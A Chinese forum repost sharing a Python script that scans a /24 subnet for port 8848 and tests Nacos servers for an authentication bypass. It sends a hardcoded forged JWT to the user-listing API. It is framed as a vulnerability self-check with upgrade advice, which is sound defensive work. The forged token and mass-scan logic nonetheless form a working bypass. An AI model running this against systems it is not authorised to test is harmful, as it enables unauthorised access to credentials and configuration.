官方確認,低版本的nacos服務(wù)管理平臺存在多個安全漏洞。這些漏洞可能導(dǎo)致配置文件中的敏感信息泄漏或系統(tǒng)被入侵的風(fēng)險。
今天浩道跟大家分享一個python腳本,主要用于自動檢測某網(wǎng)段內(nèi)主機上可能存在的nacos漏洞,可以方便大家對某網(wǎng)段內(nèi)多臺主機進行檢測,一起看看吧!
如存在漏洞,建議及時升級nacos服務(wù)管理平臺的版本,并修改默認密碼,刪除多余管理賬號。
nacos.py腳本信息如下,大家可以根據(jù)自己實際網(wǎng)段修改對應(yīng)代碼即可。該腳本實現(xiàn)掃描的是192.168.100.0網(wǎng)段內(nèi)主機上的nacos漏洞。
import requests import urllib3 import threading import socket urllib3.disable_warnings() # 定義自定義路徑和Header custom_path = '/nacos/v1/auth/users?pageNo=1&pageSize=2' header = { "User-Agent": "Nacos-Server", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Pragma": "no-cache", "Te": "trailers", "Cache-Control": "no-cache", } # 定義函數(shù),用于發(fā)起GET請求并判斷回顯結(jié)果,每次調(diào)用這個函數(shù)發(fā)送一個請求 def send_request(url): full_url = url + custom_path # 拼接完整URL try: response = requests.get(full_url, headers=header, verify=False, timeout=2) if response.status_code == 200 and response.content.find(b"pageNumber") != -1: print(f'{url} 存在nacos身份驗證繞過漏洞') else: print(f'{url} 不存在nacos身份驗證繞過漏洞') except requests.exceptions.RequestException as e: print(f'{url} 訪問失敗 {e}') # Function to check if port 8848 is open on a given IP address def is_port_open(ip, port): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2) # Set a timeout of 2 seconds for the connection attempt result = sock.connect_ex((ip, port)) sock.close() return result == 0 # Scan the 192.168.100.1 network segment for hosts with port 8848 open nacos_hosts = [] for i in range(1, 256): ip_address = f'192.168.100.{i}' if is_port_open(ip_address, 8848): nacos_hosts.append(ip_address) # Perform Nacos vulnerability check for hosts with port 8848 open if not nacos_hosts: print("No Nacos server found on port 8848 in the 192.168.100.1 network segment.") else: print(f"Found Nacos server(s) on port 8848: {', '.join(nacos_hosts)}") threads = [] for host in nacos_hosts: t = threading.Thread(target=send_request, args=(f"http://{host}:8848",)) threads.append(t) t.start() # Wait for all threads to complete for t in threads: t.join()
以下針對三個網(wǎng)段執(zhí)行腳本,如下圖所示:
責(zé)任編輯:彭菁
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。
舉報投訴
-
文件
+關(guān)注
關(guān)注
1文章
578瀏覽量
25234 -
代碼
+關(guān)注
關(guān)注
30文章
4891瀏覽量
70307 -
漏洞
+關(guān)注
關(guān)注
0文章
205瀏覽量
15637 -
python
+關(guān)注
關(guān)注
56文章
4825瀏覽量
86281 -
掃描器
+關(guān)注
關(guān)注
0文章
180瀏覽量
12286
原文標(biāo)題:【python實戰(zhàn)腳本分享】自動檢測nacos漏洞!
文章出處:【微信號:浩道linux,微信公眾號:浩道linux】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。
發(fā)布評論請先 登錄
相關(guān)推薦
熱點推薦
HR3220的無線掃描器用戶手冊
本手冊主要向用戶介紹NLS-HR3220系列無線式二維條碼掃描器(以下簡稱HR32無線掃描器或掃描器)的使用方法。
發(fā)表于 09-20 18:49
?14次下載
干貨:基于指紋識別的漏洞掃描設(shè)計方案
漏洞掃描器大家都不陌生,幾乎是每家公司必備的安全產(chǎn)品。幾乎早在快10年前,作為安全乙方,就需要扛著一臺極光掃描器,到全國各地去做各種安服。在當(dāng)時極光掃描器就是一款非常成熟的商業(yè)產(chǎn)品了,
XSS漏洞掃描器工具
XSpear是一款基于RubyGems的的XSS漏洞掃描器。擁有常見的XSS漏洞掃描攻擊測試功能。還可進行參數(shù)分析。
市場上可用的十大最佳漏洞掃描工具
OpenVAS漏洞掃描器是一種漏洞分析工具,由于其全面的特性,可以使用它來掃描服務(wù)器和網(wǎng)絡(luò)設(shè)備。這些掃描
NanoBeacon? BLE掃描器教程
到目前為止,我們已經(jīng)發(fā)布了三個關(guān)于使用我們新的NanoBeacon? BLE掃描器移動應(yīng)用程序的教程。
Android Things I2C地址掃描器
電子發(fā)燒友網(wǎng)站提供《Android Things I2C地址掃描器.zip》資料免費下載
發(fā)表于 06-13 17:02
?0次下載
紅光條碼掃描器、固定式掃描器廣泛應(yīng)用于工業(yè)制造領(lǐng)域
隨著科技的不斷進步,電子制造業(yè)、汽配行業(yè)、生產(chǎn)流水線等工業(yè)制造領(lǐng)域離不開紅光條碼掃描器。作為專用于掃描條碼、二維碼的掃描器,它在工業(yè)領(lǐng)域中扮演著重要的角色,因為它們可以幫助企業(yè)提高生產(chǎn)效率、減少
一款網(wǎng)絡(luò)攝像頭漏洞掃描工具
? 項目地址:https://github.com/jorhelp/Ingram ? 簡介 主要針對網(wǎng)絡(luò)攝像頭的漏洞掃描框架,目前已集成海康、大華、宇視、dlink等常見設(shè)備 端口掃描器 我們可以
最常見的網(wǎng)絡(luò)安全12種漏洞掃描類型
數(shù)據(jù)庫掃描技術(shù)主要用于評估數(shù)據(jù)庫系統(tǒng)的安全性,該類型會全面查找數(shù)據(jù)庫設(shè)置、訪問控制和存儲數(shù)據(jù)的漏洞,比如不安全的權(quán)限、漏洞注入問題或不安全的設(shè)置。這種掃描器需要經(jīng)常提供用于保護數(shù)據(jù)庫和
發(fā)表于 07-12 12:41
?1976次閱讀
網(wǎng)站常見漏洞checklist介紹
在做網(wǎng)站滲透之前除了關(guān)注一些通用漏洞,這些漏洞通常能很容易的利用掃描器掃出,被WAF所防護,然而有一些邏輯漏洞WAF和掃描器就無法發(fā)現(xiàn)了,就
什么是固定式條碼掃描器?固定式掃描器怎么選?
1.產(chǎn)品特性固定式條碼掃描器以其高度的可靠性而聞名。這種設(shè)備的設(shè)計旨在提供無與倫比的性能,無論是在高速掃描還是長時間持續(xù)工作的環(huán)境下。其多種掃描模式使其能夠適應(yīng)各種不同的應(yīng)用環(huán)境,無論是需要快速
嵌入式條碼掃描器的幾種掃描模式
嵌入式條碼掃描器的掃描模式是指其在識別條碼時的工作模式,這些模式會影響到掃描器的使用效果和適用場景。以下是幾種常見的嵌入式條碼掃描器的掃描模
工業(yè)固定式掃描器怎樣用?固定式工業(yè)條碼掃描器解決方案
在現(xiàn)代制造業(yè)和物流領(lǐng)域,條碼掃描技術(shù)已經(jīng)成為提高效率、減少錯誤的重要工具。工業(yè)固定式掃描器作為其中一種高效的解決方案,能夠在生產(chǎn)線、倉儲和物流管理中發(fā)揮關(guān)鍵作用。本文將探討工業(yè)固定式條碼掃描器
工商網(wǎng)監(jiān)
評論